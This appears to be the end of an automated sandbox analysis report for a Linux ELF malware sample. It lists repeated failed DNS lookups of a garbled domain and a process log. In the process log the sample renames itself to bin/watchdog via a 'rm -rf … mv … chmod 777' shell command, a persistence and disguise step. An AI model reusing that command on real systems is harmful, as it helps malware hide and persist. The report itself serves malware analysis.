                  Mar 20, 2023 17:47:17.633760929 CET192.168.2.238.8.8.80x36daStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.653882980 CET192.168.2.238.8.8.80x36daStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.674166918 CET192.168.2.238.8.8.80xa129Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.694153070 CET192.168.2.238.8.8.80xa129Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.714229107 CET192.168.2.238.8.8.80xa129Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.734304905 CET192.168.2.238.8.8.80xa129Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.754290104 CET192.168.2.238.8.8.80xa129Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.772371054 CET192.168.2.238.8.8.80x204bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.794600964 CET192.168.2.238.8.8.80x204bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.812896967 CET192.168.2.238.8.8.80x204bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.833312035 CET192.168.2.238.8.8.80x204bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.853585958 CET192.168.2.238.8.8.80x204bStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.871433020 CET192.168.2.238.8.8.80x8960Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.889847994 CET192.168.2.238.8.8.80x8960Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.909928083 CET192.168.2.238.8.8.80x8960Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.932018042 CET192.168.2.238.8.8.80x8960Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.950604916 CET192.168.2.238.8.8.80x8960Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:35.969424963 CET192.168.2.238.8.8.80xaeb3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:35.988399982 CET192.168.2.238.8.8.80xaeb3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.008583069 CET192.168.2.238.8.8.80xaeb3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.028618097 CET192.168.2.238.8.8.80xaeb3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.048665047 CET192.168.2.238.8.8.80xaeb3Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.068608046 CET192.168.2.238.8.8.80x14eeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.089103937 CET192.168.2.238.8.8.80x14eeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.112081051 CET192.168.2.238.8.8.80x14eeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.131246090 CET192.168.2.238.8.8.80x14eeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.151587009 CET192.168.2.238.8.8.80x14eeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.170164108 CET192.168.2.238.8.8.80x4ab8Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.188671112 CET192.168.2.238.8.8.80x4ab8Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.207242012 CET192.168.2.238.8.8.80x4ab8Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.226181030 CET192.168.2.238.8.8.80x4ab8Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.246366024 CET192.168.2.238.8.8.80x4ab8Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.266918898 CET192.168.2.238.8.8.80x7d89Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.285355091 CET192.168.2.238.8.8.80x7d89Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.305574894 CET192.168.2.238.8.8.80x7d89Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.326026917 CET192.168.2.238.8.8.80x7d89Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.346035004 CET192.168.2.238.8.8.80x7d89Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.365075111 CET192.168.2.238.8.8.80x6a69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.384115934 CET192.168.2.238.8.8.80x6a69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.404311895 CET192.168.2.238.8.8.80x6a69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.424573898 CET192.168.2.238.8.8.80x6a69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.442883968 CET192.168.2.238.8.8.80x6a69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.461924076 CET192.168.2.238.8.8.80xf77aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.480165958 CET192.168.2.238.8.8.80xf77aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.500761986 CET192.168.2.238.8.8.80xf77aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.521025896 CET192.168.2.238.8.8.80xf77aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.539341927 CET192.168.2.238.8.8.80xf77aStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.557642937 CET192.168.2.238.8.8.80xf1eaStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.575979948 CET192.168.2.238.8.8.80xf1eaStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.594372034 CET192.168.2.238.8.8.80xf1eaStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.614660978 CET192.168.2.238.8.8.80xf1eaStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.633071899 CET192.168.2.238.8.8.80xf1eaStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.653182030 CET192.168.2.238.8.8.80x14aeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.673428059 CET192.168.2.238.8.8.80x14aeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.691694021 CET192.168.2.238.8.8.80x14aeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.711750031 CET192.168.2.238.8.8.80x14aeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.730860949 CET192.168.2.238.8.8.80x14aeStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.751395941 CET192.168.2.238.8.8.80x5cc9Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.771099091 CET192.168.2.238.8.8.80x5cc9Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.788990974 CET192.168.2.238.8.8.80x5cc9Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.809266090 CET192.168.2.238.8.8.80x5cc9Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.829366922 CET192.168.2.238.8.8.80x5cc9Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.847174883 CET192.168.2.238.8.8.80x23d4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.867616892 CET192.168.2.238.8.8.80x23d4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.885704994 CET192.168.2.238.8.8.80x23d4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.905788898 CET192.168.2.238.8.8.80x23d4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.924072981 CET192.168.2.238.8.8.80x23d4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:42.944756985 CET192.168.2.238.8.8.80xfd72Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:42.963118076 CET192.168.2.238.8.8.80xfd72Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:42.983601093 CET192.168.2.238.8.8.80xfd72Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:43.002083063 CET192.168.2.238.8.8.80xfd72Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:43.020654917 CET192.168.2.238.8.8.80xfd72Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.041651011 CET192.168.2.238.8.8.80xc69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.061609983 CET192.168.2.238.8.8.80xc69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.081578016 CET192.168.2.238.8.8.80xc69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.099625111 CET192.168.2.238.8.8.80xc69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.119925976 CET192.168.2.238.8.8.80xc69Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.137986898 CET192.168.2.238.8.8.80x64feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.157968998 CET192.168.2.238.8.8.80x64feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.178653002 CET192.168.2.238.8.8.80x64feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.197494984 CET192.168.2.238.8.8.80x64feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.215631962 CET192.168.2.238.8.8.80x64feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 20, 2023 17:46:57.200031042 CET8.8.8.8192.168.2.230x34a6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.220463037 CET8.8.8.8192.168.2.230x34a6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.240394115 CET8.8.8.8192.168.2.230x34a6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.260369062 CET8.8.8.8192.168.2.230x34a6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:46:57.278714895 CET8.8.8.8192.168.2.230x34a6Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.299316883 CET8.8.8.8192.168.2.230x1e65Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.317951918 CET8.8.8.8192.168.2.230x1e65Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.336440086 CET8.8.8.8192.168.2.230x1e65Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.356981039 CET8.8.8.8192.168.2.230x1e65Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:00.377440929 CET8.8.8.8192.168.2.230x1e65Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.395816088 CET8.8.8.8192.168.2.230x5212Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.422207117 CET8.8.8.8192.168.2.230x5212Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.440639019 CET8.8.8.8192.168.2.230x5212Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.460772038 CET8.8.8.8192.168.2.230x5212Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:08.480822086 CET8.8.8.8192.168.2.230x5212Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.501358986 CET8.8.8.8192.168.2.230x5bfbName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.519701004 CET8.8.8.8192.168.2.230x5bfbName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.539881945 CET8.8.8.8192.168.2.230x5bfbName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.558084011 CET8.8.8.8192.168.2.230x5bfbName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:11.576536894 CET8.8.8.8192.168.2.230x5bfbName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.597105980 CET8.8.8.8192.168.2.230x36daName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.615245104 CET8.8.8.8192.168.2.230x36daName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.633483887 CET8.8.8.8192.168.2.230x36daName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.653687000 CET8.8.8.8192.168.2.230x36daName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:17.673755884 CET8.8.8.8192.168.2.230x36daName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.693797112 CET8.8.8.8192.168.2.230xa129Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.714077950 CET8.8.8.8192.168.2.230xa129Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.733990908 CET8.8.8.8192.168.2.230xa129Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.753964901 CET8.8.8.8192.168.2.230xa129Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:20.771840096 CET8.8.8.8192.168.2.230xa129Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.794317961 CET8.8.8.8192.168.2.230x204bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.812553883 CET8.8.8.8192.168.2.230x204bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.832756042 CET8.8.8.8192.168.2.230x204bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.853257895 CET8.8.8.8192.168.2.230x204bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:21.871153116 CET8.8.8.8192.168.2.230x204bName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.889426947 CET8.8.8.8192.168.2.230x8960Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.909600019 CET8.8.8.8192.168.2.230x8960Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.931610107 CET8.8.8.8192.168.2.230x8960Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.950180054 CET8.8.8.8192.168.2.230x8960Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:30.968700886 CET8.8.8.8192.168.2.230x8960Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:35.988050938 CET8.8.8.8192.168.2.230xaeb3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.008289099 CET8.8.8.8192.168.2.230xaeb3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.028259039 CET8.8.8.8192.168.2.230xaeb3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.048331022 CET8.8.8.8192.168.2.230xaeb3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:36.068392992 CET8.8.8.8192.168.2.230xaeb3Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.088766098 CET8.8.8.8192.168.2.230x14eeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.110902071 CET8.8.8.8192.168.2.230x14eeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.130920887 CET8.8.8.8192.168.2.230x14eeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.151335001 CET8.8.8.8192.168.2.230x14eeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:46.169816971 CET8.8.8.8192.168.2.230x14eeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.188369036 CET8.8.8.8192.168.2.230x4ab8Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.206935883 CET8.8.8.8192.168.2.230x4ab8Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.225836039 CET8.8.8.8192.168.2.230x4ab8Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.246076107 CET8.8.8.8192.168.2.230x4ab8Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:50.266705990 CET8.8.8.8192.168.2.230x4ab8Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.285064936 CET8.8.8.8192.168.2.230x7d89Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.305264950 CET8.8.8.8192.168.2.230x7d89Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.325726986 CET8.8.8.8192.168.2.230x7d89Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.345803022 CET8.8.8.8192.168.2.230x7d89Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:47:59.364650965 CET8.8.8.8192.168.2.230x7d89Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.383210897 CET8.8.8.8192.168.2.230x6a69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.403930902 CET8.8.8.8192.168.2.230x6a69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.424271107 CET8.8.8.8192.168.2.230x6a69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.442583084 CET8.8.8.8192.168.2.230x6a69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:06.461261034 CET8.8.8.8192.168.2.230x6a69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.479631901 CET8.8.8.8192.168.2.230xf77aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.500483036 CET8.8.8.8192.168.2.230xf77aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.520647049 CET8.8.8.8192.168.2.230xf77aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.539011002 CET8.8.8.8192.168.2.230xf77aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:09.557293892 CET8.8.8.8192.168.2.230xf77aName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.575525999 CET8.8.8.8192.168.2.230xf1eaName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.593969107 CET8.8.8.8192.168.2.230xf1eaName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.614238977 CET8.8.8.8192.168.2.230xf1eaName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.632635117 CET8.8.8.8192.168.2.230xf1eaName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:17.652791977 CET8.8.8.8192.168.2.230xf1eaName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.673091888 CET8.8.8.8192.168.2.230x14aeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.691369057 CET8.8.8.8192.168.2.230x14aeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.711412907 CET8.8.8.8192.168.2.230x14aeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.730498075 CET8.8.8.8192.168.2.230x14aeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:24.750997066 CET8.8.8.8192.168.2.230x14aeName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.770626068 CET8.8.8.8192.168.2.230x5cc9Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.788531065 CET8.8.8.8192.168.2.230x5cc9Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.808876991 CET8.8.8.8192.168.2.230x5cc9Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.828962088 CET8.8.8.8192.168.2.230x5cc9Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:31.846887112 CET8.8.8.8192.168.2.230x5cc9Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.867017984 CET8.8.8.8192.168.2.230x23d4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.885417938 CET8.8.8.8192.168.2.230x23d4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.905498981 CET8.8.8.8192.168.2.230x23d4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.923613071 CET8.8.8.8192.168.2.230x23d4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:38.944248915 CET8.8.8.8192.168.2.230x23d4Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:42.962754965 CET8.8.8.8192.168.2.230xfd72Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:42.983098030 CET8.8.8.8192.168.2.230xfd72Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:43.001745939 CET8.8.8.8192.168.2.230xfd72Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:43.020328045 CET8.8.8.8192.168.2.230xfd72Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:43.041400909 CET8.8.8.8192.168.2.230xfd72Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.061374903 CET8.8.8.8192.168.2.230xc69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.081233978 CET8.8.8.8192.168.2.230xc69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.099360943 CET8.8.8.8192.168.2.230xc69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.119606972 CET8.8.8.8192.168.2.230xc69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:53.137734890 CET8.8.8.8192.168.2.230xc69Name error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.157665014 CET8.8.8.8192.168.2.230x64feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.178350925 CET8.8.8.8192.168.2.230x64feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.197163105 CET8.8.8.8192.168.2.230x64feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.215353012 CET8.8.8.8192.168.2.230x64feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:48:58.233519077 CET8.8.8.8192.168.2.230x64feName error (3)BC@^]BnonenoneA (IP address)IN (0x0001)false

                  System Behavior

                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/tmp/k8CCRUs7Yi.elf
                  Arguments:/tmp/k8CCRUs7Yi.elf
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/tmp/k8CCRUs7Yi.elf
                  Arguments:n/a
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:/bin/sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k8CCRUs7Yi.elf bin/watchdog; chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/usr/bin/rm
                  Arguments:rm -rf bin/watchdog
                  File size:72056 bytes
                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/usr/bin/mkdir
                  Arguments:mkdir bin
                  File size:88408 bytes
                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/usr/bin/mv
                  Arguments:mv /tmp/k8CCRUs7Yi.elf bin/watchdog
                  File size:149888 bytes
                  MD5 hash:504f0590fa482d4da070a702260e3716
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/usr/bin/chmod
                  Arguments:chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4
                  File size:63864 bytes
                  MD5 hash:739483b900c045ae1374d6f53a86a279
                  Start time:17:46:55
                  Start date:20/03/2023
                  Path:/tmp/k8CCRUs7Yi.elf
                  Arguments:n/a
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
